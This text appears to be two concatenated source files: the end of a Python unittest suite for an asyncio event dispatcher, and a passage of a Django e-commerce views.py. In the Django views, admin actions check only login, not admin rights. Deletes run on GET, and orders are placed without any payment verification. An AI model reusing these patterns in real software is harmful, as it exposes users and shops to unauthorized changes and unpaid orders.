"Internal event"
param1 = "Parameter one"
param2 = "Parameter two"
class _EvtChild1(EvtOne):
'Child event'
param4 = "Parameter four"
class _EvtChild2(_EvtChild1):
'Subchild event'
param5 = "Parameter five"
self.evt_one = EvtOne
self.evt_two = EvtTwo
self.evt_internal = _EvtInternal
self.evt_child1 = _EvtChild1
self.evt_child2 = _EvtChild2
def test_dupe_event_def(self):
# Duplicate event names should fail
class EvtTest1(event.Event):
"test1"
class EvtTest2(event.Event):
"test2"
with self.assertRaises(ValueError):
class EvtTest1(event.Event):
"test3"
def test_event_set_attr(self):
ev = self.evt_one(param1=123, param3=345)
self.assertEqual(ev.param1, 123)
self.assertEqual(ev.param2, None)
self.assertEqual(ev.param3, 345)
def test_event_dispatch_func(self):
ev = self.evt_one(param1=123, param3=345)
cap_kw = {}
cap_evt = None
def capture(evt, **kw):
nonlocal cap_kw, cap_evt
cap_kw = kw
cap_evt = evt
return "set"
result = ev._dispatch_to_func(capture)
self.assertEqual(result, "set")
self.assertEqual(cap_evt, ev)
self.assertEqual(cap_kw, {"param1": 123, "param2": None, "param3": 345})
def test_event_dispatch_obj(self):
ev = self.evt_one(param1=123, param3=345)
cap_kw = {}
cap_evt = None
class capture:
def recv_evt_one(self, evt, **kw):
nonlocal cap_kw, cap_evt
cap_kw = kw
cap_evt = evt
return "set"
result = ev._dispatch_to_obj(capture())
self.assertEqual(result, "set")
self.assertEqual(cap_evt, ev)
self.assertEqual(cap_kw, {"param1": 123, "param2": None, "param3": 345})
def test_event_dispatch_obj_default(self):
ev = self.evt_one(param1=123, param3=345)
cap_kw = {}
cap_evt = None
class capture:
def recv_default_handler(self, evt, **kw):
nonlocal cap_kw, cap_evt
cap_kw = kw
cap_evt = evt
return "set"
result = ev._dispatch_to_obj(capture())
self.assertEqual(result, "set")
self.assertEqual(cap_evt, ev)
self.assertEqual(cap_kw, {"param1": 123, "param2": None, "param3": 345})
def test_event_dispatch_obj_default_internal(self):
ev = self.evt_internal(param1=123)
cap_kw = {}
cap_evt = None
class capture:
def _recv_default_handler(self, evt, **kw):
nonlocal cap_kw, cap_evt
cap_kw = kw
cap_evt = evt
return "set"
result = ev._dispatch_to_obj(capture())
self.assertEqual(result, "set")
self.assertEqual(cap_evt, ev)
self.assertEqual(cap_kw, {"param1": 123, "param2": None})
def test_event_dispatch_future(self):
ev = self.evt_one(param1=123, param3=345)
f = asyncio.Future(loop=self.loop)
ev._dispatch_to_future(f)
self.assertEqual(f.result(), ev)
def test_add_remove_handler_byfunc(self):
ins = DispatchTest(loop=self.loop)
ins.add_event_handler(self.evt_one, "one")
ins.add_event_handler(self.evt_one, "two")
ins.add_event_handler(self.evt_two, "three")
self.assertEqual(ins._dispatch_handlers["EvtOne"],
[event.Handler(ins, self.evt_one, 'one'), event.Handler(ins, self.evt_one, 'two')])
self.assertEqual(ins._dispatch_handlers["EvtTwo"],
[event.Handler(ins, self.evt_two, 'three')])
ins.remove_event_handler(self.evt_one, 'two')
self.assertEqual(ins._dispatch_handlers["EvtOne"],
[event.Handler(ins, self.evt_one, 'one')])
with self.assertRaises(ValueError):
ins.remove_event_handler(self.evt_one, 'two')
def test_dispatch_event_obj_sync(self):
recv = EventReceiver(loop=self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_one.param2, 123)
def test_dispatch_event_obj_async(self):
recv = EventReceiver(loop=self.loop)
recv.dispatch_event(self.evt_two, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_two.param2, 123)
def test_dispatch_event_obj_internal(self):
recv = EventReceiver(loop=self.loop)
recv.dispatch_event(self.evt_internal, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_internal.param2, 123)
def test_dispatch_event_handler(self):
# should fire both the object's handler, and the registered handler
recv = EventReceiver(loop=self.loop)
cap_evt = None
def capture(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, capture)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_one.param2, 123)
self.assertEqual(cap_evt.param2, 123)
def test_dispatch_event_async_handler(self):
# should fire both the object's handler, and the registered handler
recv = EventReceiver(loop=self.loop)
cap_evt = None
async def capture(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, capture)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_one.param2, 123)
self.assertEqual(cap_evt.param2, 123)
def test_dispatch_event_future(self):
# should fire both the future, and the registered handler
recv = EventReceiver(loop=self.loop)
f = asyncio.Future(loop=self.loop)
recv.add_event_handler(self.evt_one, f)
self.assertEqual(len(recv._dispatch_handlers['EvtOne']), 1)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
evt = f.result()
self.assertEqual(recv._result_evt_one.param2, 123)
self.assertEqual(evt.param2, 123)
# future should of been removed from the handler list
self.assertEqual(len(recv._dispatch_handlers['EvtOne']), 0)
def test_dispatch_to_parent(self):
recv_parent = EventReceiver(loop=self.loop)
recv_child = EventReceiver(loop=self.loop, dispatch_parent=recv_parent)
recv_child.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv_child._result_evt_one.param2, 123)
self.assertEqual(recv_parent._result_evt_one.param2, 123)
def test_dispatch_stop_propogation(self):
recv = EventReceiver(loop=self.loop)
cap_evt = None
def handler(evt, **kw):
nonlocal cap_evt
cap_evt = evt
raise exceptions.StopPropogation()
recv.add_event_handler(self.evt_one, handler)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(cap_evt.param2, 123)
self.assertIsNone(recv._result_evt_one)
def test_dispatch_wait_for_event(self):
recv = EventReceiver(loop=self.loop)
co = recv.wait_for(self.evt_one, timeout=None)
f = asyncio.ensure_future(co, loop=self.loop)
test_utils.run_briefly(self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
evt = f.result()
self.assertEqual(evt.param2, 123)
self.assertEqual(recv._result_evt_one.param2, 123)
def test_dispatch_wait_for_timeout(self):
def gen():
yield
# fake a 20 second delay
yield 20
loop = self.new_test_loop(gen=gen)
recv = EventReceiver(loop=loop)
co = recv.wait_for(self.evt_one, timeout=10)
with self.assertRaises(asyncio.TimeoutError):
loop.run_until_complete(co)
def test_dispatch_wait_for_filter(self):
recv = EventReceiver(loop=self.loop)
filter = event.Filter(self.evt_one, param2=456)
co = recv.wait_for(filter, timeout=None)
f = asyncio.ensure_future(co, loop=self.loop)
test_utils.run_briefly(self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertFalse(f.done())
recv.dispatch_event(self.evt_one, param1=False, param2=456)
test_utils.run_briefly(self.loop)
self.assertTrue(f.done())
self.assertEqual(f.result().param2, 456)
def test_dispatch_filter_decorator_single(self):
recv = EventReceiver(loop=self.loop)
cap_evt = None
@event.filter_handler(self.evt_one, param2=456)
def handler(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, handler)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertIsNone(cap_evt)
recv.dispatch_event(self.evt_one, param1=False, param2=456)
test_utils.run_briefly(self.loop)
self.assertIsNotNone(cap_evt)
self.assertEqual(cap_evt.param2, 456)
def test_dispatch_filter_setattr(self):
recv = EventReceiver(loop=self.loop)
filter = event.Filter(self.evt_one)
filter.param2 = 456
with self.assertRaises(AttributeError):
filter.param_invalid = 123
co = recv.wait_for(filter, timeout=None)
f = asyncio.ensure_future(co, loop=self.loop)
test_utils.run_briefly(self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertFalse(f.done())
recv.dispatch_event(self.evt_one, param1=False, param2=456)
test_utils.run_briefly(self.loop)
self.assertTrue(f.done())
self.assertEqual(f.result().param2, 456)
def test_dispatch_filter_decorator_multiple(self):
recv = EventReceiver(loop=self.loop)
cap_evt = None
@event.filter_handler(self.evt_one, param2=456)
@event.filter_handler(self.evt_one, param2=789)
def handler(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, handler)
for num in (123,456,234,789):
cap_evt = None
recv.dispatch_event(self.evt_one, param1=False, param2=num)
test_utils.run_briefly(self.loop)
if num in (123, 234):
self.assertIsNone(cap_evt, msg="num=%d evt=%s" % (num, cap_evt))
else:
self.assertIsNotNone(cap_evt, msg="num=%d" % (num,))
self.assertEqual(cap_evt.param2, num, msg="num=%d evt=%s" % (num, cap_evt))
def test_dispatch_filter_decorator_lambda(self):
recv = EventReceiver(loop=self.loop)
cap_evt = None
@event.filter_handler(self.evt_one, param2=lambda val: val > 400)
def handler(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, handler)
for num in (123,456,234,789):
cap_evt = None
recv.dispatch_event(self.evt_one, param1=False, param2=num)
test_utils.run_briefly(self.loop)
if num in (123, 234):
self.assertIsNone(cap_evt, msg="num=%d evt=%s" % (num, cap_evt))
else:
self.assertIsNotNone(cap_evt, msg="num=%d" % (num,))
self.assertEqual(cap_evt.param2, num, msg="num=%d evt=%s" % (num, cap_evt))
def test_obj_receiver_filter(self):
cap_evt = None
class filtered_receiver(event.Dispatcher):
@event.filter_handler(self.evt_one, param2=456)
def recv_evt_one(self, evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv = filtered_receiver(loop=self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=100)
test_utils.run_briefly(self.loop)
self.assertIsNone(cap_evt)
recv.dispatch_event(self.evt_one, param1=False, param2=456)
test_utils.run_briefly(self.loop)
self.assertIsNotNone(cap_evt)
self.assertEqual(cap_evt.param2, 456)
def test_dispatch_parents_to_handler(self):
# Test dispatching an event subclass to a handler listening to the parent
recv = EventReceiver(loop=self.loop)
cap_evts = []
def capture(evt, **kw):
nonlocal cap_evts
cap_evts.append(evt)
recv.add_event_handler(self.evt_one, capture)
recv.dispatch_event(self.evt_child2, param1=False, param2=234, param5=567)
test_utils.run_briefly(self.loop)
# only the most specific event (EvtChild2) should of been sent to the handler
self.assertEqual(1, len(cap_evts))
cap_evt = cap_evts[0]
self.assertIsInstance(cap_evt, self.evt_child2)
self.assertEqual(cap_evt.param5, 567)
def test_dispatch_parents_to_obj(self):
# Dispatching a subclass event to an object should result in only
# the most specific receiver being called
# EventReciver listens to evt_child1, but not evt_child2 so should
# receive a notification there (and only there)
recv = EventReceiver(loop=self.loop)
recv.dispatch_event(self.evt_child2, param1=False, param2=234, param5=567)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_child1.__class__, self.evt_child2)
self.assertIsNone(recv._result_evt_one)
def test_dispatch_oneshot(self):
count = 0
@event.oneshot
def handler(evt, **kw):
nonlocal count
count += 1
recv = event.Dispatcher(loop=self.loop)
hnd = recv.add_event_handler(self.evt_one, handler)
self.assertTrue(hnd.oneshot)
# dispatch twice on the same loop run; should still only be called once
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 1)
def test_handler_disable_implicit(self):
count = 0
def handler(evt, **kw):
nonlocal count
count += 1
recv = event.Dispatcher(loop=self.loop)
hnd = recv.add_event_handler(self.evt_one, handler)
# call twice
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
# should no longer be dispatched
hnd.disable()
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 2)
def test_handler_disable_explicit(self):
count = 0
def handler(evt, **kw):
nonlocal count
count += 1
recv = event.Dispatcher(loop=self.loop)
hnd = recv.add_event_handler(self.evt_one, handler)
# call twice
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
# should no longer be dispatched
recv.remove_event_handler(self.evt_one, hnd)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 2)
def test_dispatch_to_children(self):
class Target(event.Dispatcher):
def __init__(self, **kw):
super().__init__(**kw)
self.count = 0
def recv_evt_one(self, *a, **kw):
print("TRAP", self)
self.count += 1
parent = Target(loop=self.loop)
child1 = Target(loop=self.loop)
child2 = Target(loop=self.loop)
other = Target(loop=self.loop)
parent._add_child_dispatcher(child1)
parent._add_child_dispatcher(child2)
parent.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(parent.count, 1)
self.assertEqual(child1.count, 1)
self.assertEqual(child2.count, 1)
self.assertEqual(other.count, 0)
def test_dispatch_child_loops(self):
# ensure that a child event handler cannot create a dispatch loop
parent = event.Dispatcher(loop=self.loop)
child = event.Dispatcher(loop=self.loop)
parent._add_child_dispatcher(child)
count = 0
def handler(evt, *a, **kw):
nonlocal count
count += 1
parent.dispatch_event(evt)
child.add_event_handler(self.evt_one, handler)
parent.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
# run loop twice to allow a second dispatched event to be delivered
# (or hopefully not)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 1)
def test_dispatch_child_dupe(self):
# ensure that a child handler cannot redeliver an event to a sibling
# child object
parent = event.Dispatcher(loop=self.loop)
class Child(event.Dispatcher):
def __init__(self, **kw):
super().__init__(**kw)
self.count = 0
def recv_evt_one(self, evt, *a, **kw):
# attempt to deliver to the other child
self.count += 1
self.other_child.dispatch_event(evt)
child1 = Child(loop=self.loop)
child2 = Child(loop=self.loop)
child1.other_child = child2
child2.other_child = child1
parent._add_child_dispatcher(child1)
parent._add_child_dispatcher(child2)
parent.dispatch_event(self.evt_one, param1=False, param2=123)
for i in range(4):
test_utils.run_briefly(self.loop)
self.assertEqual(child1.count, 1)
self.assertEqual(child2.count, 1)
def test_stop_dispatcher(self):
count = 0
def handler(evt, *a, **kw):
nonlocal count
count += 1
recv = event.Dispatcher(loop=self.loop)
recv.add_event_handler(self.evt_one, handler)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
recv._stop_dispatcher()
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(count, 2)
def test_obj_abort_futures(self):
recv = event.Dispatcher(loop=self.loop)
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
fut3 = asyncio.Future(loop=self.loop)
fut3.set_result('result') # should not be aborted
exc = ValueError('test exception')
recv.add_event_handler(self.evt_one, fut1)
recv.add_event_handler(self.evt_one, fut2)
recv.add_event_handler(self.evt_one, fut3)
print(recv._dispatch_handlers)
recv._abort_event_futures(exc)
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertEqual(fut1.exception(), exc)
self.assertEqual(fut2.exception(), exc)
# futures should of been removed
handlers = recv._dispatch_handlers['EvtOne']
self.assertEqual(len(handlers), 0)
def test_global_abort_futures(self):
# check that the global _abort_futures call actually calls
# each active dispatcher objects' abort_futures method.
event.active_dispatchers.clear()
# define two event classes that should auto-register themselves
class Target(event.Dispatcher):
def __abort_event_futures(exc):
self._abort_exc = exc
recv1 = Target(loop=self.loop)
recv2 = Target(loop=self.loop)
self.assertEqual(len(event.active_dispatchers), 2)
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
recv1.add_event_handler(self.evt_one, fut1)
recv2.add_event_handler(self.evt_one, fut2)
exc = ValueError('test exception')
event._abort_futures(exc)
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertEqual(fut1.exception(), exc)
self.assertEqual(fut2.exception(), exc)
def test_wait_for_first_with_discard1(self):
# test that uncompleted futures are cancelled
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
self.loop.call_soon(lambda: fut2.set_result("done"))
co = event.wait_for_first(fut1, fut2, loop=self.loop)
result = self.loop.run_until_complete(co)
self.assertEqual(result, "done")
self.assertTrue(fut1.cancelled())
def test_wait_for_first_with_discard2(self):
# test that racing completed futures are marked as done
class Fut(asyncio.Future):
def result(self):
self.result_called = True
return super().result()
fut1 = Fut(loop=self.loop)
fut2 = Fut(loop=self.loop)
self.loop.call_soon(lambda: fut2.set_result("done"))
self.loop.call_soon(lambda: fut1.set_result("done"))
co = event.wait_for_first(fut1, fut2, loop=self.loop)
result = self.loop.run_until_complete(co)
self.assertEqual(result, "done") # don't care which future
self.assertTrue(fut1.result_called)
self.assertTrue(fut2.result_called)
def test_wait_for_first_with_discard_exception(self):
# test that racing completed futures are marked as done
class Fut(asyncio.Future):
def result(self):
self.result_called = True
return super().result()
fut1 = Fut(loop=self.loop)
fut2 = Fut(loop=self.loop)
self.loop.call_soon(lambda: fut2.set_result("done"))
self.loop.call_soon(lambda: fut1.set_exception("test exception"))
co = event.wait_for_first(fut1, fut2, loop=self.loop)
result = self.loop.run_until_complete(co)
self.assertEqual(result, "done") # must get result rather than exception
self.assertTrue(fut1.result_called)
self.assertTrue(fut2.result_called)
def test_wait_for_first_no_discard(self):
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
self.loop.call_soon(lambda: fut2.set_result("done"))
co = event.wait_for_first(fut1, fut2, discard_remaining=False, loop=self.loop)
result = self.loop.run_until_complete(co)
self.assertEqual(result, "done")
self.assertFalse(fut1.cancelled())
def test_wait_for_first_raise_exc(self):
# ensure raised exceptions are returned
fut1 = asyncio.Future(loop=self.loop)
fut2 = asyncio.Future(loop=self.loop)
class TestExc(Exception): pass
exc = TestExc('test exception')
self.loop.call_soon(lambda: fut2.set_exception(exc))
co = event.wait_for_first(fut1, fut2, loop=self.loop)
with self.assertRaises(TestExc):
result = self.loop.run_until_complete(co)
self.assertTrue(fut1.cancelled())
| 37.004213
| 99
| 0.640111
|
794db07ec015e21e366e867ac4e06628283c5bfb
| 21,207
|
py
|
Python
|
ecom/views.py
|
patrickikhidero/e-Market
|
8a79959371ba47bbe22d3451d5b3076cefee86ef
|
[
"MIT"
] | null | null | null |
ecom/views.py
|
patrickikhidero/e-Market
|
8a79959371ba47bbe22d3451d5b3076cefee86ef
|
[
"MIT"
] | null | null | null |
ecom/views.py
|
patrickikhidero/e-Market
|
8a79959371ba47bbe22d3451d5b3076cefee86ef
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render,redirect,reverse
from . import forms,models
from django.http import HttpResponseRedirect,HttpResponse
from django.core.mail import send_mail
from django.contrib.auth.models import Group
from django.contrib.auth.decorators import login_required,user_passes_test
from django.contrib import messages
from django.conf import settings
def home_view(request):
products=models.Product.objects.all()
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'ecom/index.html',{'products':products,'product_count_in_cart':product_count_in_cart})
#for showing login button for admin(by by Patoricode)
def adminclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return HttpResponseRedirect('adminlogin')
def customer_signup_view(request):
userForm=forms.CustomerUserForm()
customerForm=forms.CustomerForm()
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST)
customerForm=forms.CustomerForm(request.POST,request.FILES)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(user.password)
user.save()
customer=customerForm.save(commit=False)
customer.user=user
customer.save()
my_customer_group = Group.objects.get_or_create(name='CUSTOMER')
my_customer_group[0].user_set.add(user)
return HttpResponseRedirect('customerlogin')
return render(request,'ecom/customersignup.html',context=mydict)
#-----------for checking user iscustomer
def is_customer(user):
return user.groups.filter(name='CUSTOMER').exists()
#---------AFTER ENTERING CREDENTIALS WE CHECK WHETHER USERNAME AND PASSWORD IS OF ADMIN,CUSTOMER
def afterlogin_view(request):
if is_customer(request.user):
return redirect('customer-home')
else:
return redirect('admin-dashboard')
#---------------------------------------------------------------------------------
#------------------------ ADMIN RELATED VIEWS START ------------------------------
#---------------------------------------------------------------------------------
@login_required(login_url='adminlogin')
def admin_dashboard_view(request):
# for cards on dashboard
customercount=models.Customer.objects.all().count()
productcount=models.Product.objects.all().count()
ordercount=models.Orders.objects.all().count()
# for recent order tables
orders=models.Orders.objects.all()
ordered_products=[]
ordered_bys=[]
for order in orders:
ordered_product=models.Product.objects.all().filter(id=order.product.id)
ordered_by=models.Customer.objects.all().filter(id = order.customer.id)
ordered_products.append(ordered_product)
ordered_bys.append(ordered_by)
mydict={
'customercount':customercount,
'productcount':productcount,
'ordercount':ordercount,
'data':zip(ordered_products,ordered_bys,orders),
}
return render(request,'ecom/admin_dashboard.html',context=mydict)
# admin view customer table
@login_required(login_url='adminlogin')
def view_customer_view(request):
customers=models.Customer.objects.all()
return render(request,'ecom/view_customer.html',{'customers':customers})
# admin delete customer
@login_required(login_url='adminlogin')
def delete_customer_view(request,pk):
customer=models.Customer.objects.get(id=pk)
user=models.User.objects.get(id=customer.user_id)
user.delete()
customer.delete()
return redirect('view-customer')
@login_required(login_url='adminlogin')
def update_customer_view(request,pk):
customer=models.Customer.objects.get(id=pk)
user=models.User.objects.get(id=customer.user_id)
userForm=forms.CustomerUserForm(instance=user)
customerForm=forms.CustomerForm(request.FILES,instance=customer)
mydict={'userForm':userForm,'customerForm':customerForm}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST,instance=user)
customerForm=forms.CustomerForm(request.POST,instance=customer)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(user.password)
user.save()
customerForm.save()
return redirect('view-customer')
return render(request,'ecom/admin_update_customer.html',context=mydict)
# admin view the product
@login_required(login_url='adminlogin')
def admin_products_view(request):
products=models.Product.objects.all()
return render(request,'ecom/admin_products.html',{'products':products})
# admin add product by clicking on floating button
@login_required(login_url='adminlogin')
def admin_add_product_view(request):
productForm=forms.ProductForm()
if request.method=='POST':
productForm=forms.ProductForm(request.POST, request.FILES)
if productForm.is_valid():
productForm.save()
return HttpResponseRedirect('admin-products')
return render(request,'ecom/admin_add_products.html',{'productForm':productForm})
@login_required(login_url='adminlogin')
def delete_product_view(request,pk):
product=models.Product.objects.get(id=pk)
product.delete()
return redirect('admin-products')
@login_required(login_url='adminlogin')
def update_product_view(request,pk):
product=models.Product.objects.get(id=pk)
productForm=forms.ProductForm(instance=product)
if request.method=='POST':
productForm=forms.ProductForm(request.POST,request.FILES,instance=product)
if productForm.is_valid():
productForm.save()
return redirect('admin-products')
return render(request,'ecom/admin_update_product.html',{'productForm':productForm})
@login_required(login_url='adminlogin')
def admin_view_booking_view(request):
orders=models.Orders.objects.all()
ordered_products=[]
ordered_bys=[]
for order in orders:
ordered_product=models.Product.objects.all().filter(id=order.product.id)
ordered_by=models.Customer.objects.all().filter(id = order.customer.id)
ordered_products.append(ordered_product)
ordered_bys.append(ordered_by)
return render(request,'ecom/admin_view_booking.html',{'data':zip(ordered_products,ordered_bys,orders)})
@login_required(login_url='adminlogin')
def delete_order_view(request,pk):
order=models.Orders.objects.get(id=pk)
order.delete()
return redirect('admin-view-booking')
# for changing status of order (pending,delivered...)
@login_required(login_url='adminlogin')
def update_order_view(request,pk):
order=models.Orders.objects.get(id=pk)
orderForm=forms.OrderForm(instance=order)
if request.method=='POST':
orderForm=forms.OrderForm(request.POST,instance=order)
if orderForm.is_valid():
orderForm.save()
return redirect('admin-view-booking')
return render(request,'ecom/update_order.html',{'orderForm':orderForm})
# admin view the feedback
@login_required(login_url='adminlogin')
def view_feedback_view(request):
feedbacks=models.Feedback.objects.all().order_by('-id')
return render(request,'ecom/view_feedback.html',{'feedbacks':feedbacks})
#---------------------------------------------------------------------------------
#------------------------ PUBLIC CUSTOMER RELATED VIEWS START ---------------------
#---------------------------------------------------------------------------------
def search_view(request):
# whatever user write in search box we get in query
query = request.GET['query']
products=models.Product.objects.all().filter(name__icontains=query)
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
# word variable will be shown in html when user click on search button
word="Searched Result :"
if request.user.is_authenticated:
return render(request,'ecom/customer_home.html',{'products':products,'word':word,'product_count_in_cart':product_count_in_cart})
return render(request,'ecom/index.html',{'products':products,'word':word,'product_count_in_cart':product_count_in_cart})
# any one can add product to cart, no need of signin
def add_to_cart_view(request,pk):
products=models.Product.objects.all()
#for cart counter, fetching products ids added by customer from cookies
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=1
response = render(request, 'ecom/index.html',{'products':products,'product_count_in_cart':product_count_in_cart})
#adding product id to cookies
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids=="":
product_ids=str(pk)
else:
product_ids=product_ids+"|"+str(pk)
response.set_cookie('product_ids', product_ids)
else:
response.set_cookie('product_ids', pk)
product=models.Product.objects.get(id=pk)
messages.info(request, product.name + ' added to cart successfully!')
return response
# for checkout of cart
def cart_view(request):
#for cart counter
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
# fetching product details from db whose id is present in cookie
products=None
total=0
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids != "":
product_id_in_cart=product_ids.split('|')
products=models.Product.objects.all().filter(id__in = product_id_in_cart)
#for total price shown in cart
for p in products:
total=total+p.price
return render(request,'ecom/cart.html',{'products':products,'total':total,'product_count_in_cart':product_count_in_cart})
def remove_from_cart_view(request,pk):
#for counter in cart
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
# removing product id from cookie
total=0
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
product_id_in_cart=product_ids.split('|')
product_id_in_cart=list(set(product_id_in_cart))
product_id_in_cart.remove(str(pk))
products=models.Product.objects.all().filter(id__in = product_id_in_cart)
#for total price shown in cart after removing product
for p in products:
total=total+p.price
# for update coookie value after removing product id in cart
value=""
for i in range(len(product_id_in_cart)):
if i==0:
value=value+product_id_in_cart[0]
else:
value=value+"|"+product_id_in_cart[i]
response = render(request, 'ecom/cart.html',{'products':products,'total':total,'product_count_in_cart':product_count_in_cart})
if value=="":
response.delete_cookie('product_ids')
response.set_cookie('product_ids',value)
return response
def send_feedback_view(request):
feedbackForm=forms.FeedbackForm()
if request.method == 'POST':
feedbackForm = forms.FeedbackForm(request.POST)
if feedbackForm.is_valid():
feedbackForm.save()
return render(request, 'ecom/feedback_sent.html')
return render(request, 'ecom/send_feedback.html', {'feedbackForm':feedbackForm})
#---------------------------------------------------------------------------------
#------------------------ CUSTOMER RELATED VIEWS START ------------------------------
#---------------------------------------------------------------------------------
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_home_view(request):
products=models.Product.objects.all()
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
return render(request,'ecom/customer_home.html',{'products':products,'product_count_in_cart':product_count_in_cart})
# shipment address before placing order
@login_required(login_url='customerlogin')
def customer_address_view(request):
# this is for checking whether product is present in cart or not
# if there is no product in cart we will not show address form
product_in_cart=False
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids != "":
product_in_cart=True
#for counter in cart
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
counter=product_ids.split('|')
product_count_in_cart=len(set(counter))
else:
product_count_in_cart=0
addressForm = forms.AddressForm()
if request.method == 'POST':
addressForm = forms.AddressForm(request.POST)
if addressForm.is_valid():
# here we are taking address, email, mobile at time of order placement
# we are not taking it from customer account table because
# these thing can be changes
email = addressForm.cleaned_data['Email']
mobile=addressForm.cleaned_data['Mobile']
address = addressForm.cleaned_data['Address']
#for showing total price on payment page.....accessing id from cookies then fetching price of product from db
total=0
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids != "":
product_id_in_cart=product_ids.split('|')
products=models.Product.objects.all().filter(id__in = product_id_in_cart)
for p in products:
total=total+p.price
response = render(request, 'ecom/payment.html',{'total':total})
response.set_cookie('email',email)
response.set_cookie('mobile',mobile)
response.set_cookie('address',address)
return response
return render(request,'ecom/customer_address.html',{'addressForm':addressForm,'product_in_cart':product_in_cart,'product_count_in_cart':product_count_in_cart})
# here we are just directing to this view...actually we have to check whther payment is successful or not
#then only this view should be accessed
@login_required(login_url='customerlogin')
def payment_success_view(request):
# Here we will place order | after successful payment
# we will fetch customer mobile, address, Email
# we will fetch product id from cookies then respective details from db
# then we will create order objects and store in db
# after that we will delete cookies because after order placed...cart should be empty
customer=models.Customer.objects.get(user_id=request.user.id)
products=None
email=None
mobile=None
address=None
if 'product_ids' in request.COOKIES:
product_ids = request.COOKIES['product_ids']
if product_ids != "":
product_id_in_cart=product_ids.split('|')
products=models.Product.objects.all().filter(id__in = product_id_in_cart)
# Here we get products list that will be ordered by one customer at a time
# these things can be change so accessing at the time of order...
if 'email' in request.COOKIES:
email=request.COOKIES['email']
if 'mobile' in request.COOKIES:
